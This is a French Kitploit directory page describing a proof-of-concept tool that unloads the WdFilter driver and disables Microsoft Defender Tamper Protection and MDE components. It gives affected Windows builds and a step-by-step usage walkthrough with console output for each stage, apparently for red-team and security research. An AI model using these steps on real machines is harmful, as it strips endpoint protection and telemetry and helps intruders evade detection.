Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Disable-TamperProtection — Un POC pour désactiver TamperProtection et d'autres composants Defender / MDE | Kitploit
Outils/GitHubGitHub/alteredsecurity/disable-tamperprotection
Post-ExploitationTests d'IntrusionRed TeamingAttaque Adversariale
GitHubalteredsecurity/disable-tamperprotection

Disable-TamperProtection

Un POC pour désactiver TamperProtection et d'autres composants Defender / MDE

Voir le dépôt
258403il y a 2 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Désactivation de la protection contre la falsification et d'autres composants Defender / MDE

Il est possible d'abuser des privilèges SYSTEM / TrustedInstaller pour altérer ou supprimer les paramètres de WdFilter (clé de registre ALTITUDE) et décharger le minidriver du noyau afin de désactiver la protection contre la falsification et d'autres composants de Defender. Cela affecte également Microsoft Defender for Endpoint (MDE), privant MDE de la télémétrie et de l'activité effectuée sur une cible.

Cette vulnérabilité, lors des tests, s'est avérée affecter les versions suivantes de Windows :

  • Windows Server 2022 jusqu'à la version BuildLabEx : 20348.1.amd64fre.fe_release.210507-1500 (mise à jour d'avril 2024)
  • Windows Server 2019
  • Windows 10 jusqu'à la version BuildLabEx : 19041.1.amd64fre.vb_release.191206-1406 (mise à jour d'avril 2024)
  • Windows 11 jusqu'à la version BuildLabEx : 22621.1.amd64fre.ni_release.220506-1250 (mise à jour de septembre 2023).

Blog expliquant le contournement et la POC : https://www.alteredsecurity.com/post/disabling-tamper-protection-and-other-defender-mde-components

Utilisation

REMARQUE : VC_redist.x64.exe (runtime MSVC) peut devoir être installé sur la cible.

Démo de la POC : https://youtu.be/MI6aVDHRix8

La POC fonctionne en 3 étapes (privilèges administrateur requis) :

root@kitploit:~
C:\> .\Disable-TamperProtection.exe
Sequential Usage: 1 --> 2 --> 3
1:      Unload WdFilter
2:      Disable Tamper Protection
3:      Disable AV/MDE
4:      Restore AV/MDE settings

Un exemple d'utilisation de la POC est le suivant :

  1. Décharger WdFilter :
root@kitploit:~
C:\> .\Disable-TamperProtection.exe 1
[+] WdFilter Altitude Registry key Value: 328010
[+] Trusted Installer handle: 0000000000000120
[!] Spawning registry with TrustedInstaller privileges to delete WdFilter "Altitude" regkey.
[+] Created process ID: 3744 and assigned additional token privileges.
[+] Execute option 1 to validate!

# Upon 2nd execution if the above output repeats the target isn't vulnerable
C:\> .\Disable-TamperProtection.exe 1
[+] WdFilter Altitude Registry key has been successfully deleted.
[+] Enumerating WdFilter information:
        Next:   0 | Frame ID:   0 | No. of Instances:   4 | Name:        wdfilter | Altitude:          328010
[+] Restart the system or wait a few minutes for WdFilter to unload.
[+] Execute option 1 to validate!

# Restart to crash and unload WdFilter
C:\> .\Disable-TamperProtection.exe 1
[+] WdFilter Altitude Registry key has been successfully deleted.
[+] WDFilter has been successfully unloaded, use option 2 to disable Tamper Protection.
  1. Désactiver la protection contre la falsification :
root@kitploit:~
C:\> .\Disable-TamperProtection.exe 2
[+] WdFilter Altitude Registry key has been successfully deleted.
[+] Trusted Installer handle: 00000000000000C4
[!] Spawning registry with TrustedInstaller privileges to alter Defender "TamperProtection" regkey from 5 to 4.
[+] Created process ID: 7748 and assigned additional token privileges.
[+] Use option '3' to finally Disable AV/MDE.
  1. Désactiver les composants Defender / MDE :
root@kitploit:~
C:\> .\Disable-TamperProtection.exe 3
[+] WdFilter Altitude Registry key has been successfully deleted.
[+] Trusted Installer handle: 000000000000011C
[!] Spawning registry with TrustedInstaller privileges to Disable 'RealtimeMonitoring' regkey.
[+] To disable other components of defender check source.
[+] Created process ID: 8040 and assigned additional token privileges.
  1. Rétablir / restaurer le minidriver WdFilter, la protection contre la falsification et les paramètres de Defender (temps réel). Assurez-vous de remettre le numéro Altitude (par défaut : 328010) à sa valeur d'origine à la ligne 530 de la POC.
root@kitploit:~
# Restart the computer after execution to restore settings successfully
C:\> .\Disable-TamperProtection.exe 4
[+] WdFilter Altitude Registry key has been successfully deleted.
[+] Make sure to change Altitude in Source (Default: 328010) and reboot computer after execution.
[+] Trusted Installer handle: 0000000000000120
[!] Spawning registry with TrustedInstaller privileges to Enable 'RealtimeMonitoring' regkey.
[+] Created process ID: 5852 and assigned additional token privileges.
[!] Spawning registry with TrustedInstaller privileges to Enable 'TamperProtection' regkey.
[+] Created process ID: 2744 and assigned additional token privileges.
[!] Spawning registry with TrustedInstaller privileges to restore WdFilter "Altitude" regkey.
[+] Created process ID: 7044 and assigned additional token privileges.

Références

  • Groupes d'ordre de chargement et altitudes pour les pilotes minifilter par Microsoft
  • NSudo
  • superUser
  • Article de recherche sur l'aveuglement de Defender
  • MDE Internals par FalconForce

Crédits

Publié par : Munaf Shariff (@m3rcer)

Chercheur en sécurité chez Altered Security

Télécharger l’outil